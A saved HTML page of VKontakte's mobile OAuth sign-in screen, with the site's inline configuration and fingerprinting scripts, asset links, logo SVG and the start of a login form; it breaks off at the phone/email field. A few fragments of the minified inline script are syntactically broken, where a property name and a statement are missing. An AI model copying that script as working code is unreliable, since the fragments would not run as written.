            <!DOCTYPE html>
      <html lang="ru" class="vk vk_js_no vk_1x vk_flex_no r d h  vk_appAuth_no n vk_old  vk_schemes_no ">
      <meta charset="utf-8">
              <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, minimal-ui, user-scalable=no" />
        <meta name="format-detection" content="telephone=no" />
        <meta http-equiv="X-UA-Compatible" content="IE=edge" />
        <meta name="MobileOptimized" content="176" />
        <meta name="HandheldFriendly" content="True" />
        <base id="base">

        <meta name="description" content="" />
        <meta property="og:description" content="" />
        <link rel="shortcut icon" href="/images/icons/favicons/fav_logo.ico?8"></link>
            <meta name="theme-color" content="#ffffff" />
    <link rel="icon" type="image/png" sizes="32x32" href="/images/icons/pwa/favicon_32.png?11">
    <link rel="apple-touch-icon" href="/images/icons/pwa/apple/default.png?11">
    <meta name="apple-mobile-web-app-title" content="ВКонтакте">
    <meta name="application-name" content="ВКонтакте">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
        <title>Получение доступа к ВКонтакте | ВКонтакте</title>
        <meta http-equiv="origin-trial" content="Av8ECqeAAIiC9bF3N7aq2M/TaxNzzpPcFXnw0rRb9KRUQlbyHKYmPj6KeVUFVDk+S7W9RfJH2GsEOS8G99uJvgcAAABaeyJvcmlnaW4iOiJodHRwczovL3ZrLmNvbTo0NDMiLCJmZWF0dXJlIjoiQmFkZ2luZyIsImV4cGlyeSI6MTU2MTY2MTkxNCwiaXNTdWJkb21haW4iOnRydWV9">

        <script>
          (function() {
            window.vk = {"id":0,"__debug":false,"__dev":false,"wsTransport":"https:\/\/stats.vk-portal.net","statsMeta":{"platform":"mvk","st":false,"time":1612595284,"hash":"BzHeqjLUHYjE6sILUpY75GBrCanZPuLDs5AhYhBfd6H"},"tnsPixelType":"unauth","tnsPixelSocdem":"13","platform":"mvk","rv":"105961","ts":1612595284,"sw":null,"stFiles":{"https:\/\/st1-88.vk.com\/css\/mobile\/variables.19c7aacb3ceebc9ef5cc.css":"","https:\/\/st1-88.vk.com\/css\/mobile\/oauth_base.ce29c0122efd568d82dd.css":"","https:\/\/st1-88.vk.com\/css\/mobile\/common.053a81397048f7db693b.css":"","https:\/\/st1-88.vk.com\/css\/mobile\/unauthorized.242b30cdfd8912c4015b.css":"","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/runtime.1625559b22a7090bea03.js":"5e92c796c9f1f3809150857dc7951de01cb6903cd3b51fbc26d9d70c4a6ed212","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/vendor.86035dc025cb3996671b.js":"7ddb5c6c8c5b3956db312d5abb17bb8b753fcc400235f040d18e43fb5be2352c","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/polyfills.d90a2df71b369fd48387.js":"56ab783dd68c34d8ae09532ddfb53c9424310711274d115b73433645e32d52f1","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/icons.d6259a03b4c78c535d5a.js":"6c6ebbed1af0ca599901e00ea6449f9869fb24e35d909f4806244784faaf217e","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/b-4fbe5729dafd17d68efbc7284390bc0f.70ce38fcccab544181d6.js":"868a09e61444e26bee03b288a6ddace388de0238cd7073b3ea44410d55e4b799","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/b-bcc87cd429a5b075c1981971084df9a2.140194dd162d43ccb5b6.js":"de0685fa50526617b7d8d82dc673329a540cefb4cad95604f2eae4d1552c9f78","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/common.42a4110ba8437bf767ec.js":"d3aeb7a07c241c17b6fc6730f4b0d7f4540c90ea8bfd093f05f2e7ea791c2eaf","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/grip.84b126b59734b56043c1.js":"73e857998de8df95e53bfeedcbc0524e1f6aade31123c04847c406a1047d4fad","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/unauthorized.8fa6ed21a64d877552b0.js":"a175903a8362d152af66088677aceaebcdaf9d2f1ad9bc5e1e8888748caac78d"},"stNavMap":{"^\\\/join":["https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/runtime.1625559b22a7090bea03.js","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/vendor.86035dc025cb3996671b.js","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/icons.d6259a03b4c78c535d5a.js","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/b-4fbe5729dafd17d68efbc7284390bc0f.70ce38fcccab544181d6.js","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/b-bcc87cd429a5b075c1981971084df9a2.140194dd162d43ccb5b6.js","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/join.0585e43735a192621435.js","https:\/\/st1-88.vk.com\/css\/mobile\/join.8a0ec4cd83850643f54b.css"],"promocode(\\\/([0-9a-zA-Z-]+))?":["https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/runtime.1625559b22a7090bea03.js","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/vendor.86035dc025cb3996671b.js","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/icons.d6259a03b4c78c535d5a.js","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/b-4fbe5729dafd17d68efbc7284390bc0f.70ce38fcccab544181d6.js","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/b-bcc87cd429a5b075c1981971084df9a2.140194dd162d43ccb5b6.js","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/promocode.05e6c21415752bf4aa68.js","https:\/\/st1-88.vk.com\/css\/mobile\/promocode.7008324ec2aafb688785.css"],"^\\\/video":["https:\/\/st1-88.vk.com\/css\/mobile\/video.cbad45e05f3d69ded38b.css","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/runtime.1625559b22a7090bea03.js","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/vendor.86035dc025cb3996671b.js","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/icons.d6259a03b4c78c535d5a.js","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/b-4fbe5729dafd17d68efbc7284390bc0f.70ce38fcccab544181d6.js","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/b-bcc87cd429a5b075c1981971084df9a2.140194dd162d43ccb5b6.js","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/video.5d7ede5e25556b28df65.js","https:\/\/st1-88.vk.com\/css\/mobile\/mail.05c56fd308fb6adfece9.css"],"^\\\/clip":["https:\/\/st1-88.vk.com\/css\/mobile\/ShortVideoPage.7730b2d47847f84a10b8.css","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/runtime.1625559b22a7090bea03.js","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/vendor.86035dc025cb3996671b.js","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/icons.d6259a03b4c78c535d5a.js","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/b-4fbe5729dafd17d68efbc7284390bc0f.70ce38fcccab544181d6.js","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/b-bcc87cd429a5b075c1981971084df9a2.140194dd162d43ccb5b6.js","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/short_video.15d4bb54052b15dd8380.js","https:\/\/st1-88.vk.com\/css\/mobile\/mail.05c56fd308fb6adfece9.css"],"^\\\/(photo|album|tag|attachments|market)":["https:\/\/st1-88.vk.com\/css\/mobile\/photo.9df4230efda6409bff93.css","https:\/\/st1-88.vk.com\/css\/mobile\/mail.05c56fd308fb6adfece9.css"],"^\\\/(wall|mail|write|im|chatjoin)":["https:\/\/st1-88.vk.com\/css\/mobile\/mail.05c56fd308fb6adfece9.css","https:\/\/st1-88.vk.com\/css\/mobile\/wall.c25bc9fd02b6f2787a56.css"],"settings\\?act=money_transfer_history":["https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/runtime.1625559b22a7090bea03.js","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/vendor.86035dc025cb3996671b.js","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/icons.d6259a03b4c78c535d5a.js","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/b-4fbe5729dafd17d68efbc7284390bc0f.70ce38fcccab544181d6.js","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/b-bcc87cd429a5b075c1981971084df9a2.140194dd162d43ccb5b6.js","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/money_transfer_history.d70bd50b03df50ebdc6c.js","https:\/\/st1-88.vk.com\/css\/mobile\/money_transfer_history.78005b0c01f936b453e0.css"],"reports\\?act=":["https:\/\/st1-88.vk.com\/css\/mobile\/reports.cff6c24a3443efc8018b.css"],"^\\\/(blog|about|press|jobs|products|adv)":["https:\/\/st1-88.vk.com\/css\/mobile\/blog.412f4f22d6daf370190a.css","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/runtime.1625559b22a7090bea03.js","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/vendor.86035dc025cb3996671b.js","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/icons.d6259a03b4c78c535d5a.js","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/b-4fbe5729dafd17d68efbc7284390bc0f.70ce38fcccab544181d6.js","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/b-bcc87cd429a5b075c1981971084df9a2.140194dd162d43ccb5b6.js","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/blog.7161ebb7affaf7f6eb06.js","https:\/\/st1-88.vk.com\/css\/mobile\/mail.05c56fd308fb6adfece9.css"],"^\\\/(product|cart|orders|market\\.php)(\\??[0-9a-zA-Z=_-]+)?":["https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/runtime.1625559b22a7090bea03.js","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/vendor.86035dc025cb3996671b.js","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/icons.d6259a03b4c78c535d5a.js","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/b-4fbe5729dafd17d68efbc7284390bc0f.70ce38fcccab544181d6.js","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/b-bcc87cd429a5b075c1981971084df9a2.140194dd162d43ccb5b6.js","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/market.c1e13379577790dc9523.js","https:\/\/st1-88.vk.com\/css\/mobile\/market.199e2fbd251140964414.css"],"^\\\/groups_catalog\\\/([0-9a-zA-Z_\\-]+)$":["https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/runtime.1625559b22a7090bea03.js","https:\/\/st1-88.vk.com\/js\/cmodules\/mobile\/groups_catalog.f8feeb6e82e96d796c6b.js"]},"pe":{"vk_apps_svg_qr":1,"upload.send_upload_stat":1,"push_notifier":1,"use_web_vitals_api":1,"notify_new_events_box":1,"mini_apps_web_add_to_favorites":1,"mini_apps_web_add_to_menu":1,"mini_apps_m_web_new_stub_page":1,"cookie_secure_default_true":1,"stickers_bot_link":1,"widgets_xdm_same_origin":1,"stickers_money_transfer_suggestions":1,"web2_story_box_enabled":1,"bridge_mobile_story_box_enabled":1,"gifts_stickers_preview_tooltips":1,"navigation_timespent":1,"market_item_recommendations_view_log":1,"market_item_others_view_log":1,"web_stats_transport_story_view":1,"registration_item_stat":1,"mvk_lazy_static_reload":1,"notifications_view_new":1,"ads_market_autopromotion_bookmarks_stats":1,"mini_apps_web_call_api_form_data":1,"web_new_photo_editor":1,"web_new_photo_editor_crop":1,"web_photo_editor_hide_entrypoint":1,"web_stats_try_send":1,"stickers_catalog_reload_after_buy":1,"web_stats_send_on_events_limit":1,"batchify_web_stats":1,"stickers_web_new_ui":1,"ads_new_reports_web_tgb":1,"ads_autopromotion_web_cashback":1,"recognize_mock_turn_off":1,"photo_recognition_web":1,"aliexpress_app_links_with_partner_links":1,"ads_new_reports_web_histories":1,"ads_new_reports_mvk_histories":1,"audio_unauth_preview":1,"audio_unauth_preview_box":1,"ads_easy_promote_goods_new_create_api":1,"unauthorized_media_layer_box":1,"mail_history_unread_counter_observer":1,"pinned_conversations":1,"messenger_empty_pinned_support":1},"ex":[],"audioAdsConfig":{"_":"_"}};
            window.isMVK = true;
            window.isCustomScroll = false;
            window.isNewMail = false;
            window.isNewLongpoll = false;
            window.audioSubscribe = false;
            window.isArticleWebView = false;

            var vkElem = document.querySelector('.vk');
            var vkClass = vkElem.getAttribute('class');

            function cssPropertySupported(pNames) {
              var element = document.createElement('a');
              var index = pNames.length;
              try {
                while (index--) {
                  var name = pNames[index];

                  element.style.display = name;
                  if (element.style.display === name) {
                    return true;
                  }
                }
              } catch (pError) {}

              return false;
            }
            var supports = {
              js: true,
              flex: cssPropertySupported('flex -webkit-flex -ms-flexbox -moz-box -webkit-box'.split(' ')),
            };

            supports.js && (vkClass = vkClass.replace('vk_js_no', 'vk_js_yes'));
            supports.flex && (vkClass = vkClass.replace('vk_flex_no', 'vk_flex_yes'));
            vkElem.setAttribute('class', vkClass);
          })();
        </script>


        <script type="text/javascript">
<!--
;(function(){"use strict";function e(e){t(e),e.hash_redirect&&o(e),e.al_ver&&(window.al={ver:e.al_ver}),document.addEventListener("DOMContentLoaded",(function(){e.help_hints&&window.Tooltip&&window.Tooltip.initHelpHints&&window.Tooltip.initHelpHints(e.help_hints)}))}function t(e){var t=e.iospwa_cookie,o=e.device_cookie,i=e.cookie_secure,n=e.cookie_samesite,a=e.cookie_path,r=e.cookie_domain,c=e.need_reload,s=new Date((new Date).getTime()+7776e6).toUTCString();!0===navigator.standalone&&-1===document.cookie.indexOf(t+"=1")&&(document.cookie=t+"=1; expires="+s+";"+i+n+" path="+a+"; domain="+r);var l=document,u=window,d="undefined",p="!",h="-",f=u.screen,m=f.width||0,v=f.height||0,y=u.devicePixelRatio||1,w=new RegExp("(^|;\\s+)"+o+"=([^;]+)"),g=(l.cookie.match(w)||[])[2]||"",T=g.split("/");if(g&&m==T[0]&&v==T[1]&&y==T[2]&&7===T[3].length);else{var k=[m,v,y,M()].join("/");l.cookie=o+"=; expires="+new Date(0).toUTCString()+";"+i+n+" path="+a,l.cookie=o+"="+k+"; expires="+s+";"+i+n+" path="+a+"; domain="+r,""!==l.cookie&&c&&}function M(){var e=(function(){var e;try{e=new XMLHttpRequest}catch(t){try{e=new ActiveXObject("Msxml2.XMLHTTP")}catch(t){try{e=new ActiveXObject("Microsoft.XMLHTTP")}catch(e){}}}return e?"!":"-"})(),t=((o=l.createElement("div")).='<input type="file" />',"file"!==(o=o.getElementsByTagName("input")[0]).type||o.disabled?"-":"!"),o,i="ontouchstart"in u?"!":"-",n="-",a,r,c;try{(typeof navigator.geolocation!==d||typeof u.google!==d&&typeof google.gears!==d||typeof device!==d&&typeof device.getServiceObject!==d||typeof Mojo!==d&&"Mojo.Service.Request"!=typeof Mojo.Service.Request)&&(n="!")}catch(e){}return[e,t,i,n,(function(e){try{var t=u.Audio?new Audio:l.createElement("audio");if(t.canPlayType&&t.canPlayType(e)&&"no"!==t.canPlayType(e))return"!"}catch(e){}return"-"})("audio/mpeg"),(function(e){try{for(var t=l.createElement("div"),o=["","webkit","Moz","ms","O"],i=0,n=o.length;i<n;i++){var a=o[i],r=a?a+e:e.toLowerCase();if(typeof t.style[r]!==d)return"!"}return"-"}catch(e){return"-"}})("Transform"),(u.XMLHttpRequest||u.XDomainRequest)&&(u.FormData||u.FileReader&&(u.XMLHttpRequest&&XMLHttpRequest.sendAsBinary||u.ArrayBuffer&&u.Uint8Array&&(u.MozBlobBuilder||u.WebKitBlobBuilder||u.BlobBuilder)))?"!":"-"].join("")}}function o(e){var t=e.cookie_secure,o=e.cookie_samesite,i=location,n=i.hash||"",a=n.substr(2);if("#/"===n.substr(0,2)){var r=window.locDomain,c=new Date;c.setTime(c.getTime()+864e5);var s="; expires="+c.toGMTString();document.cookie=["remixtmp_hash_nav","=",escape(i.href),s,"; path=/",""+t,""+o,r?"; domain=."+r:""].join(""),a.match(/^\/*(away|login)(\.php)?([^a-z0-9\.]|$)/)&&(a=""),i.replace(i.protocol+"//"+i.host+"/"+a)}}return e})()({"hash_redirect":false,"device_cookie":"remixmdevice","iospwa_cookie":"remixmiospwa","cookie_path":"\/","cookie_domain":".vk.com","cookie_samesite":"","cookie_secure":" Secure;","need_reload":true,"help_hints":{"mvk:video_filters":{"id":"mvk:video_filters","active":false,"hash":null},"feed:textlive_hide":{"id":"feed:textlive_hide","active":true,"hash":"7ca958e52885167794"},"narratives:add_tooltip":{"id":"narratives:add_tooltip","active":false,"hash":null},"community:textlives_counter":{"id":"community:textlives_counter","active":false,"hash":null},"feed:post_reaction":{"id":"feed:post_reaction","active":false,"hash":null}},"al_ver":""});
//-->
</script>
        <link rel="stylesheet" href="https://st1-88.vk.com/css/mobile/variables.19c7aacb3ceebc9ef5cc.css?">
<link rel="stylesheet" href="https://st1-88.vk.com/css/mobile/oauth_base.ce29c0122efd568d82dd.css?">
<link rel="stylesheet" href="https://st1-88.vk.com/css/mobile/common.053a81397048f7db693b.css?">
<link rel="stylesheet" href="https://st1-88.vk.com/css/mobile/unauthorized.242b30cdfd8912c4015b.css?">
<script src="https://st1-88.vk.com/js/cmodules/mobile/runtime.1625559b22a7090bea03.js?5e92c796c9f1f3809150857dc7951de01cb6903cd3b51fbc26d9d70c4a6ed212"></script>
<script src="https://st1-88.vk.com/js/cmodules/mobile/vendor.86035dc025cb3996671b.js?7ddb5c6c8c5b3956db312d5abb17bb8b753fcc400235f040d18e43fb5be2352c"></script>
<script src="https://st1-88.vk.com/js/cmodules/mobile/polyfills.d90a2df71b369fd48387.js?56ab783dd68c34d8ae09532ddfb53c9424310711274d115b73433645e32d52f1"></script>
<script src="https://st1-88.vk.com/js/cmodules/mobile/icons.d6259a03b4c78c535d5a.js?6c6ebbed1af0ca599901e00ea6449f9869fb24e35d909f4806244784faaf217e"></script>
<script src="https://st1-88.vk.com/js/cmodules/mobile/b-4fbe5729dafd17d68efbc7284390bc0f.70ce38fcccab544181d6.js?868a09e61444e26bee03b288a6ddace388de0238cd7073b3ea44410d55e4b799"></script>
<script src="https://st1-88.vk.com/js/cmodules/mobile/b-bcc87cd429a5b075c1981971084df9a2.140194dd162d43ccb5b6.js?de0685fa50526617b7d8d82dc673329a540cefb4cad95604f2eae4d1552c9f78"></script>
<script src="https://st1-88.vk.com/js/cmodules/mobile/common.42a4110ba8437bf767ec.js?d3aeb7a07c241c17b6fc6730f4b0d7f4540c90ea8bfd093f05f2e7ea791c2eaf"></script>
<script src="https://st1-88.vk.com/js/cmodules/mobile/grip.84b126b59734b56043c1.js?73e857998de8df95e53bfeedcbc0524e1f6aade31123c04847c406a1047d4fad"></script>
<script src="https://st1-88.vk.com/js/cmodules/mobile/unauthorized.8fa6ed21a64d877552b0.js?a175903a8362d152af66088677aceaebcdaf9d2f1ad9bc5e1e8888748caac78d"></script>



      </head>

      <body  class="vk__page _touch vk_ios_no vk_stickers_hints_support_no opera_mini_no vk_safari_no vk__page_oauth vk_tabbar_static    vk_al_no ">
        <script id="color-scheme-script" type="text/javascript">
<!--
;(function(){"use strict";function e(e){var o=e.colorSchemeMode,c=e.isForcedColorSchemeMode,r=e.isDarkSchemeGuideHidden,s=e.colorSchemesMap;if(window.colorScheme){var t=o;try{var i=sessionStorage.getItem("colorScheme");i&&(t=i,window.colorScheme.isModeSavingAllowed=!1),c&&(t=o,window.colorScheme.isModeSavingAllowed=!1,sessionStorage.setItem("colorScheme",o))}catch(e){}window.colorScheme.init({mode:t,schemesMap:s});var d=document.querySelector(".vk"),n=d.getAttribute("class");window.isSchemesSupported()&&(n=n.replace("vk_schemes_no","vk_schemes_yes")),d.setAttribute("class",n),window.isSchemesSupported()&&!r&&onDOMReady((function(){window.DarkSchemeModal.open()}))}var m=document.getElementById("color-scheme-script");m.parentNode.removeChild(m)}return e})()({"colorSchemeMode":"auto","isForcedColorSchemeMode":false,"isDarkSchemeGuideHidden":true,"colorSchemesMap":null});
//-->
</script>

            <div class="layout">

          <div class="layout__header mhead" id="vk_head">
      <div class="hb_wrap">
        <div class="hb_btn">&nbsp;</div>
      </div>
    </div>
      <div class="layout__body " id="vk_wrap">
        <div class="layout__leftMenu" id="l">

        </div>
        <div class="layout__basis" id="m" role="main">
              <div class="basis">
      <div class="basis__header mhead basis__header_noBottomMenu basis__header_noshadow basis__header_noshadowAnim basis__header_unauthorized_actions basis__header_nohide" id="mhead"><div class="hb_wrap mhb_logo">
  <div class=" lmh_logo_wrap">
    <div class="hb_btn mhi_logo">&nbsp;</div>
    <div class="mhi_logo_text"><div class="mhi_logo_text_light"><div aria-hidden="true" class="svgIcon svgIcon-vk_logo_text_light_26"><svg width="123" height="26" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M18.36 12.73a3.05 3.05 0 011.51 1.08c.4.5.6 1.1.6 1.8 0 .63-.19 1.2-.55 1.7-.37.5-.89.9-1.56 1.2-.66.27-1.4.4-2.25.4h-5.95V7.02h5.7c.81 0 1.54.13 2.18.4.64.28 1.14.66 1.49 1.15.35.47.52 1.02.52 1.65 0 1.14-.56 1.99-1.7 2.52zm-5.57-3.55v2.59h3.07c.46 0 .83-.12 1.12-.34.3-.25.44-.56.44-.94 0-.39-.15-.7-.44-.94a1.69 1.69 0 00-1.12-.37h-3.07zm3.32 7.56c.52 0 .93-.13 1.24-.39.32-.27.48-.63.48-1.05 0-.45-.16-.8-.48-1.06-.3-.27-.72-.4-1.24-.4H12.8v2.9h3.32zm17.61 2.18h-3.46l-4.12-4.75h-.64v4.75h-2.63V7h2.63v4.63h.64L30.13 7h3.14l-5.02 5.73 5.48 6.19zm6.73.23a6.92 6.92 0 01-3.3-.78 5.92 5.92 0 01-2.27-2.2 6.4 6.4 0 01-.8-3.21c0-1.2.27-2.25.8-3.18a5.71 5.71 0 012.27-2.2c.98-.54 2.08-.8 3.3-.8 1.22 0 2.31.26 3.28.8a5.52 5.52 0 012.26 2.2c.55.93.83 1.99.83 3.18 0 1.2-.28 2.26-.83 3.2a5.72 5.72 0 01-2.26 2.2c-.97.53-2.06.79-3.28.79zm0-2.4a3.5 3.5 0 002.61-1.04c.67-.7 1.01-1.62 1.01-2.75s-.34-2.04-1-2.73a3.45 3.45 0 00-2.62-1.05c-1.07 0-1.94.35-2.61 1.05-.67.7-1.01 1.6-1.01 2.73s.34 2.05 1 2.75a3.5 3.5 0 002.62 1.03zm16.63-5.05V7h2.64v11.92h-2.64V14.1h-5.33v4.82H49.1V7h2.64v4.7h5.33zm11.23 7.22h-2.64V9.4h-4.12V7h10.88v2.4h-4.12v9.5zM78.67 6.77a4.6 4.6 0 013.6 1.45c.88.94 1.33 2.28 1.33 4v6.7h-1.95l-.55-1.88a4.3 4.3 0 01-3.83 2.1c-.79 0-1.5-.15-2.15-.48a3.58 3.58 0 01-1.47-1.35 3.72 3.72 0 01-.52-1.97c0-1.13.44-2.03 1.33-2.7.9-.69 2.2-1.03 3.91-1.03h2.57a3 3 0 00-.73-1.88 2.1 2.1 0 00-1.68-.71c-.56 0-1.05.14-1.46.41a2.62 2.62 0 00-.92 1l-2.43-.4c.3-1.01.89-1.8 1.79-2.39a5.78 5.78 0 013.16-.87zm-.78 10.15c.92 0 1.66-.3 2.22-.89.57-.6.85-1.38.85-2.36h-2.5c-1.78 0-2.67.52-2.67 1.56 0 .52.18.93.57 1.24.38.3.9.45 1.53.45zm19.43 2h-3.46l-4.13-4.75h-.64v4.75h-2.63V7h2.63v4.63h.64L93.72 7h3.14l-5.02 5.73 5.48 6.19zm7.1 0h-2.63V9.4h-4.13V7h10.88v2.4h-4.12v9.5zm17.2-6.1c0 .23-.02.51-.05.85h-9.58c.12.93.5 1.68 1.15 2.25.64.55 1.45.82 2.45.82.67 0 1.27-.13 1.8-.39.56-.26.98-.61 1.27-1.05l2.47.4a4.88 4.88 0 01-2.22 2.55c-1.04.6-2.2.9-3.48.9-1.2 0-2.26-.26-3.21-.78a5.85 5.85 0 01-2.2-2.2 6.56 6.56 0 01-.78-3.21c0-1.2.26-2.25.78-3.18a5.64 5.64 0 012.2-2.2 6.4 6.4 0 013.2-.8c1.2 0 2.26.26 3.2.8a5.49 5.49 0 012.2 2.17c.53.92.8 1.94.8 3.07zm-6.2-3.76c-.79 0-1.48.23-2.08.7a3.46 3.46 0 00-1.19 1.85h6.6a3.52 3.52 0 00-1.24-1.83 3.19 3.19 0 00-2.08-.71z" fill="#000"/></svg></div></div><div class="mhi_logo_text_dark"><div aria-hidden="true" class="svgIcon svgIcon-vk_logo_text_dark_26"><svg width="123" height="26" fill="none" xmlns="http://www.w3.org/2000/svg"><path d="M18.36 12.73a3.05 3.05 0 011.52 1.07c.4.5.6 1.11.6 1.81 0 .63-.2 1.2-.56 1.7-.37.5-.89.9-1.56 1.2-.65.27-1.4.4-2.24.4h-5.96V7h5.7c.82 0 1.54.14 2.18.41.64.28 1.14.66 1.5 1.15.34.47.52 1.02.52 1.65 0 1.14-.57 1.98-1.7 2.52zM12.8 9.18v2.59h3.06c.46 0 .84-.12 1.13-.35.29-.24.43-.56.43-.94 0-.38-.14-.7-.43-.94a1.69 1.69 0 00-1.12-.36H12.8zm3.32 7.56c.52 0 .93-.13 1.23-.4.32-.27.48-.62.48-1.05 0-.44-.15-.8-.47-1.05-.31-.28-.72-.41-1.24-.41h-3.33v2.9h3.33zm17.61 2.17h-3.46l-4.12-4.74h-.65v4.74h-2.63V7h2.63v4.63h.65L30.13 7h3.14l-5.02 5.73 5.48 6.18zm6.73.23a6.92 6.92 0 01-3.3-.78 5.92 5.92 0 01-2.27-2.2 6.4 6.4 0 01-.8-3.2c0-1.2.26-2.26.8-3.19a5.71 5.71 0 012.27-2.2c.97-.53 2.07-.8 3.3-.8 1.22 0 2.3.27 3.27.8A5.52 5.52 0 0146 9.77c.55.93.82 2 .82 3.19s-.27 2.26-.82 3.2a5.72 5.72 0 01-2.27 2.2c-.96.52-2.05.78-3.27.78zm0-2.4a3.5 3.5 0 002.6-1.03c.68-.7 1.02-1.62 1.02-2.75s-.34-2.04-1.01-2.73a3.45 3.45 0 00-2.61-1.05c-1.07 0-1.94.35-2.62 1.05-.67.69-1 1.6-1 2.73s.33 2.04 1 2.75a3.5 3.5 0 002.62 1.03zm16.63-5.04V7h2.63V18.9H57.1v-4.8h-5.34v4.8h-2.63V7h2.63v4.7h5.34zM68.3 18.9h-2.63v-9.5h-4.13V7h10.89v2.4H68.3v9.52zM78.68 6.77a4.6 4.6 0 013.6 1.44c.88.95 1.32 2.29 1.32 4.01v6.7h-1.95l-.55-1.89a4.3 4.3 0 01-3.83 2.1c-.79.01-1.5-.15-2.15-.47a3.58 3.58 0 01-1.46-1.35 3.73 3.73 0 01-.53-1.97c0-1.13.44-2.03 1.33-2.7.9-.7 2.2-1.04 3.92-1.04h2.56a3 3 0 00-.73-1.88 2.1 2.1 0 00-1.67-.7c-.57 0-1.06.13-1.47.4a2.62 2.62 0 00-.91 1.02l-2.43-.42c.29-1 .88-1.8 1.78-2.38a5.78 5.78 0 013.17-.87zm-.78 10.15c.91 0 1.65-.3 2.22-.9.56-.59.85-1.38.85-2.35h-2.5c-1.79 0-2.68.52-2.68 1.56 0 .52.19.93.57 1.23.38.3.9.46 1.54.46zm19.42 2h-3.46l-4.12-4.75h-.64v4.74h-2.64V7h2.63v4.63h.65L93.72 7h3.14l-5.01 5.73 5.47 6.18zm7.1 0h-2.63V9.4h-4.12V7h10.88v2.4h-4.13v9.52zm17.2-6.1c0 .23-.02.51-.05.85H112c.13.93.5 1.68 1.15 2.24.64.55 1.46.83 2.45.83.67 0 1.28-.13 1.81-.4.55-.25.97-.6 1.26-1.05l2.48.42a4.89 4.89 0 01-2.23 2.54c-1.04.6-2.2.9-3.48.9-1.19 0-2.26-.27-3.2-.79a5.85 5.85 0 01-2.2-2.2 6.56 6.56 0 01-.79-3.2c0-1.2.26-2.26.78-3.19a5.64 5.64 0 012.2-2.2 6.4 6.4 0 013.21-.8c1.2 0 2.25.27 3.19.8a5.49 5.49 0 012.2 2.18c.53.92.8 1.94.8 3.07zm-6.19-3.76c-.8 0-1.49.23-2.08.69a3.45 3.45 0 00-1.2 1.85h6.6a3.53 3.53 0 00-1.23-1.83 3.19 3.19 0 00-2.09-.7z" fill="#E1E3E6"/></svg></div></div></div>
  </div>
  <h1 class="hb_btn mh_header">&nbsp;</h1>
</div>
</div>
      <div class="basis__menu"><div class="VideoFilterBadgeFiller"></div></div>

      <div class="basis__content mcont " id="mcont" data-canonical=""><div class="pcont fit_box bl_cont">
  <div class="PageBlock">
  <div class="owner_panel oauth_mobile_header">

    <div class="">

      <div class="op_info">Для продолжения вам необходимо войти <b>ВКонтакте</b>.</div>
    </div>
  </div>
  <div class="form_item fi_fat">

    <form method="post" action="https://login.vk.com/?act=login&soft=1&utf8=1">
      <input type="hidden" name="_origin" value="https://oauth.vk.com">
      <input type="hidden" name="ip_h" value="a8265db393490ddd0f" />
      <input type="hidden" name="lg_h" value="22d20c1136eec2322f" />
      <input type="hidden" name="to" value="aHR0cHM6Ly9vYXV0aC52ay5jb20vYXV0aG9yaXplP2NsaWVudF9pZD02MzgzMzgwJnJlZGlyZWN0X3VyaT1odHRwcyUzQSUyRiUyRmJsYWNrLmxvYyUyRmF1dGglMkZ2a29udGFrdGUmcmVzcG9uc2VfdHlwZT1jb2RlJnNjb3BlPTI2MjE0NCZ2PTUuMTAxJnN0YXRlPXNlY3JldF9zdGF0ZV9jb2RlJmRpc3BsYXk9cGFnZQ--">
      <dl class="fi_row">
        <dt class="fi_label">Телефон или email:</dt>
